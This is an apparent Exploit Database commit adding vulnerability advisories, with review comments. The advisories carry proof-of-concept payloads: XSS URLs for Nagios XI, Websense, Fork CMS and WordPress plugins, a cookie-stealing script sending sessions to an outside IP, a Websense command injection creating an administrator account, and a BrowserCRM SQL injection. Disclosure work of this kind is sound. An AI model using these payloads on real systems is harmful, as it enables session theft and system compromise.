
Commit b3e4367

Author: Offensive Security
DB: 2015-03-21
19 new exploits
1 parent 9a428f4 commit b3e4367

20 files changed

Lines changed: 323 additions & 0 deletions

files.csv

Lines changed: 19 additions & 0 deletions
@@ -32863,3 +32863,22 @@ id,file,description,date,author,platform,type,port
3286332863
36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
3286432864
36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
3286532865
36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection Vulnerability",2015-03-19,"Han Sahin",linux,webapps,0
32866+
36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-13,Am!r,php,webapps,0
32867+
36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 'twiz-index.php' Cross Site Scripting Vulnerability",2011-12-31,Am!r,php,webapps,0
32868+
36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0
32869+
36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0
32870+
36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32871+
36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 modules/Documents/index.php contact_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32872+
36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 Multiple Script URI XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32873+
36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 license/index.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32874+
36452,platforms/php/webapps/36452.txt,"BrowserCRM 5.100.1 licence/view.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32875+
36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 pub/clients.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32876+
36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 index.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32877+
36455,platforms/multiple/remote/36455.txt,"Nagios XI Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-14,anonymous,multiple,remote,0
32878+
36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 'userid' Parameter Authentication Bypass Vulnerability",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0
32879+
36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 Triton Report Management Interface Cross Site Scripting Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0
32880+
36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton 'ws_irpt.exe' Remote Command Execution Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0
32881+
36459,platforms/cgi/webapps/36459.txt,"Websense 7.6 Products 'favorites.exe' Authentication Bypass Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0
32882+
36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 'rub' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
32883+
36461,platforms/php/webapps/36461.txt,"Social Network Community 2 'userID' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
32884+
36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection Vulnerability",2011-12-18,Lazmania61,php,webapps,0
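
Review bot: Row 36455 (Nagios XI) is filed under `platforms/multiple/remote` with type `remote`, while every other cross-site scripting row added in this hunk is typed `webapps`; reclassify it for consistency or record why it differs. The ids also jump from 36442 to 36444 with no 36443 row, rows 36451 and 36452 spell the directory `license/` and `licence/` respectively (check both against the application), and the BrowserCRM rows give the version as 5.100.1 where 36448.txt says 5.100.01.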

platforms/cgi/webapps/36457.txt

Lines changed: 18 additions & 0 deletions
@@ -0,0 +1,18 @@
1+
source: http://www.securityfocus.com/bid/51085/info
2+
3+
Websense Triton is prone to a cross-site scripting vulnerability.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
This issue affects the following applications:
8+
9+
Websense Web Security Gateway Anywhere v7.6
10+
Websense Web Security Gateway v7.6
11+
Websense Web Security v7.6
12+
Websense Web Filter v7.6
13+
14+
https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>alert(document.cookie)</script>&section=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360
15+
16+
Send the current session-cookies to a credentials-collection server:
17+
18+
https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>document.location=unescape("http://192.168.1.64/"%2bencodeURIComponent(document.cookie))</script>&section=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360
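
Review bot: The advisory text never names the injectable parameter; in both sample URLs (lines 14 and 18) the markup break directly follows the `dTitle` value, and the description should say so, so that defenders know which input to validate and which `detail.exe` requests to look for in logs. The product list writes `v7.6` where 36459.txt writes `7.6`; pick one form. The samples also carry a concrete 32-hex `session=` value and a private address (192.168.1.64), which would be cleaner as obvious placeholders.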

platforms/cgi/webapps/36458.txt

Lines changed: 7 additions & 0 deletions
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/51086/info
2+
3+
Websense Triton is prone to a remote command-execution vulnerability.
4+
5+
An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
6+
7+
https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|
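
Review bot: No affected product or version is listed, although files.csv titles this entry "Websense 7.6 Triton" and the sibling files 36457.txt and 36459.txt enumerate the 7.6 products; add the same list here. The text also does not say which request parameter reaches the command interpreter (the sample on line 7 uses `SendFile`) or whether the request needs an authenticated session, both of which matter for triage and for writing a detection on `ws_irpt.exe` requests.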

platforms/cgi/webapps/36459.txt

Lines changed: 14 additions & 0 deletions
@@ -0,0 +1,14 @@
1+
source: http://www.securityfocus.com/bid/51087/info
2+
3+
Multiple Websense products are prone to an authentication-bypass vulnerability.
4+
5+
Remote attackers can exploit this issue to bypass the authentication mechanism and gain unauthorized access.
6+
7+
The following Websense products are affected:
8+
9+
Websense Web Security Gateway Anywhere 7.6
10+
Websense Web Security Gateway 7.6
11+
Websense Web Security 7.6
12+
Websense Web Filter 7.6
13+
14+
https://www.example.com/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def
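
Review bot: The sample request on line 14 comes with no statement of what it demonstrates; the file should say what a client without a session is expected to receive from `favorites.exe` and what it actually receives, otherwise the bypass cannot be verified or regression-tested after patching. Version strings here are `7.6` where 36457.txt writes `v7.6`.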
platforms/multiple/remote/36455.txt

Lines changed: 99 additions & 0 deletions
@@ -0,0 +1,99 @@
1+
source: www.securityfocus.com/bid/51069/info
2+
3+
Nagios XI is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
4+
5+
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
6+
7+
Nagios XI versions prior to 2011R1.9 are vulnerable.
8+
9+
Reflected XSS
10+
-----
11+
12+
Page: /nagiosxi/login.php
13+
Variables: -
14+
PoCs: http://site/nagiosxi/login.php/";alert(&#039;0a29&#039;);"
15+
Details: The URL is copied into JavaScript variable &#039;backend_url&#039; in an unsafe
16+
manner
17+
Also affects:
18+
/nagiosxi/about/index.php
19+
/nagiosxi/about/index.php
20+
/nagiosxi/about/main.php
21+
/nagiosxi/account/main.php
22+
/nagiosxi/account/notifymethods.php
23+
/nagiosxi/account/notifymsgs.php
24+
/nagiosxi/account/notifyprefs.php
25+
/nagiosxi/account/testnotification.php
26+
/nagiosxi/help/index.php
27+
/nagiosxi/help/main.php
28+
/nagiosxi/includes/components/alertstream/go.php
29+
/nagiosxi/includes/components/alertstream/index.php
30+
/nagiosxi/includes/components/hypermap_replay/index.php
31+
/nagiosxi/includes/components/massacknowledge/mass_ack.php
32+
/nagiosxi/includes/components/xicore/recurringdowntime.php/
33+
/nagiosxi/includes/components/xicore/status.php
34+
/nagiosxi/includes/components/xicore/tac.php
35+
/nagiosxi/reports/alertheatmap.php
36+
/nagiosxi/reports/availability.php
37+
/nagiosxi/reports/eventlog.php
38+
/nagiosxi/reports/histogram.php
39+
/nagiosxi/reports/index.php
40+
/nagiosxi/reports/myreports.php
41+
/nagiosxi/reports/nagioscorereports.php
42+
/nagiosxi/reports/notifications.php
43+
/nagiosxi/reports/statehistory.php
44+
/nagiosxi/reports/topalertproducers.php
45+
/nagiosxi/views/index.php
46+
/nagiosxi/views/main.php
47+
48+
Page: /nagiosxi/account/
49+
Variables: xiwindow
50+
PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert(&#039;0a29&#039;)</script>
51+
52+
Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php
53+
Variables: -
54+
PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/&#039;><script>alert("0a29")</script>
55+
56+
Page: /nagiosxi/includes/components/xicore/status.php
57+
Variables: hostgroup, style
58+
PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=&#039;><script>alert("0a29")</script>
59+
http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>
60+
61+
Page: /nagiosxi/includes/components/xicore/recurringdowntime.php
62+
Variables: -
63+
PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/&#039;;}}alert(&#039;0a29&#039;)</script>
64+
65+
66+
Page: /nagiosxi/reports/alertheatmap.php
67+
Variables: height, host, service, width
68+
PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>
69+
http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>
70+
http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>
71+
http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>
72+
73+
Page: /nagiosxi/reports/histogram.php
74+
Variable: service
75+
PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>
76+
77+
Page: /nagiosxi/reports/notifications.php
78+
Variables: host, service
79+
PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>
80+
http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>
81+
82+
Page: /nagiosxi/reports/statehistory.php
83+
Variables: host, service
84+
PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>
85+
http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>
86+
87+
88+
Stored XSS
89+
-----
90+
91+
Page: /nagiosxi/reports/myreports.php
92+
Variable: title
93+
Details: It is possible to store XSS within &#039;My Reports&#039;, however it
94+
is believed this
95+
is only viewable by the logged-in user.
96+
1) View a report and save it, e.g.
97+
http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D
98+
2) Name the report with XSS, e.g. "><script>alert("0a29")</script>
99+
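
Review bot: HTML entities were left undecoded on import: `&#039;` stands in for an apostrophe on lines 14, 15, 50, 54, 58, 63 and 93, so the samples and the prose do not read as the original advisory intended; decode them. `/nagiosxi/about/index.php` is listed twice (lines 18 and 19), the `source:` line lacks the `http://` scheme the other files use, the label alternates between `Variable:` and `Variables:`, and the sentences on lines 15 to 16 and 93 to 95 are hard-wrapped mid-sentence.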

platforms/php/webapps/36444.txt

Lines changed: 7 additions & 0 deletions
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/51031/info
2+
3+
flash-album-gallery plug-in for WordPress is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss]
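
Review bot: No affected plug-in version is given, unlike 36445.txt which names 1.3.9.4; state the tested version of flash-album-gallery, or say that it is unknown, so the entry can be matched against an installed plug-in. The description should also name the `pid` parameter of `flagshow.php`, which appears only in the URL on line 7.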

platforms/php/webapps/36445.txt

Lines changed: 9 additions & 0 deletions
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/51037/info
2+
3+
The Welcomizer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
The Welcomizer 1.3.9.4 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/[path]/wp-content/plugins/the-welcomizer/twiz-index.php?page=[xss]
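
Review bot: Line 5 says "these issues", but line 3 and the single URL on line 9 describe one vulnerability, in the `page` parameter of `twiz-index.php`; make line 5 singular or list the other issues.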

platforms/php/webapps/36446.txt

Lines changed: 21 additions & 0 deletions
@@ -0,0 +1,21 @@
1+
source: http://www.securityfocus.com/bid/51045/info
2+
3+
Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
Fork CMS 3.1.5 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/blog/detail/article?utm_source=feed&utm_medium=rss"><script>alert(&#039;xss&#039;)</script>
10+
11+
http://www.example.com/search?form=search&q_widget=&submit="><script>alert(&#039;xss&#039;)</script>
12+
13+
http://www.example.com/search?form=search&q_widget="><script>alert(&#039;xss&#039;)</script>
14+
15+
http://www.example.com/search?form="><script>alert(&#039;xss&#039;)</script>
16+
17+
http://www.example.com/private/en/users/edit?id=1"><script>alert(&#039;xss&#039;)</script>
18+
19+
http://www.example.com/private/en/pages/edit?token=true&id=1"><script>alert(&#039;xss&#039;)</script>
20+
21+
http://www.example.com/private/en/mailmotor/settings?token="><script>alert(&#039;xss&#039;)</script>
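
Review bot: Every sample URL on lines 9 to 21 contains the literal entity `&#039;` where an apostrophe was intended; decode it so the file matches the original advisory. The three URLs under `/private/en/` are listed alongside the public `/blog` and `/search` ones with no note on whether they require an authenticated back-end session, which changes the exposure and should be stated.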

platforms/php/webapps/36447.txt

Lines changed: 10 additions & 0 deletions
@@ -0,0 +1,10 @@
1+
source: http://www.securityfocus.com/bid/51056/info
2+
3+
Pulse Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
Pulse Pro 1.7.2 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/index.php?p=blocks&d="><script>alert(1)</script>
10+
http://www.example.com/index.php?p=edit-post&post_id="><script>alert(1)</script>

platforms/php/webapps/36448.txt

Lines changed: 9 additions & 0 deletions
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/51060/info
2+
3+
Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
4+
5+
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
Browser CRM 5.100.01 is vulnerable; prior versions may also be affected.
8+
9+
http://www.example.com/modules/Documents/version_list.php?parent_id=1%20AND%201=2%20--%202
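
Review bot: Line 7 gives the version as 5.100.01 while the files.csv rows for this product say 5.100.1; make them agree. The description on line 3 covers multiple SQL-injection and cross-site scripting issues, but this file holds only the `parent_id` case on line 9; narrow the text to that parameter or point to entries 36449 through 36454 for the rest.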
